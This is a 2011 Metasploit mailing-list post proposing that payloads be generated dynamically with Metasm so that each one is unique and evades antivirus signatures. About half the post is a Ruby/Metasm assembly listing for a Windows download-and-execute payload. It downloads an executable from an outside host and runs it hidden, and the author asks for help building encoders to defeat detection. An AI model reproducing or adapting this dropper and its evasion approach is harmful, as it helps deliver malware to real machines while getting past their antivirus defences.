Metasploit mailing list archives
Payload AV evasion thoughts...
From: John B <johnb.electric () gmail com>
Date: Mon, 18 Apr 2011 09:09:17 -0400
I brought up this idea a few months ago on the mailing list, but there might be some more interest in it now. The idea is to use Metasm to dynamically create payloads instead of using the base template. I've been able to produce a portable (XP-7) message box payload that is assembled on the fly, but I don't have enough ASM experience to make it unique, meaning that if two people use the same title and msg string then the payloads would be identical. I've seen some work in the framework with Metasm-created encoders for Mips (https://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/encoders/mipsbe/longxor.rb) and outside the framework with a smiley encoder (http://www.cr0.org/misc/smile.rb) for IM exploits.

Here's an example of how a basic download-execute payload would look (example only, probably not the most AV-evasive way):

////code
require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS
.entrypoint
    ; URLDownloadToFileA(NULL, URL, PATH, 0, NULL)
    push 0
    push 0
    push PATH
    push URL
    push 0
    call download
    ; ShellExecuteA(NULL, CMD, PATH, NULL, NULL, 0 /* SW_HIDE */)
    push 0
    push 0
    push 0
    push PATH
    push CMD
    push 0
    call execute
    ret

.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download

.data
URL  db "http://someaddress.com/download/hellow.exe", 0
PATH db "c:/users/john/testd.exe", 0
CMD  db "open", 0
EOS

pe.encode_file 'down.exe'
///////end code

Combine that with code to make it portable across all systems, then add an encoding stub, and we can create unique payloads every time without the need for templates (with the assumption that the templates are the main way of detecting payloads). I will continue to work on some full examples, but anyone with asm experience who could create some dynamic encoders with Metasm would really be helpful.

John
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... egypt (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 21)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)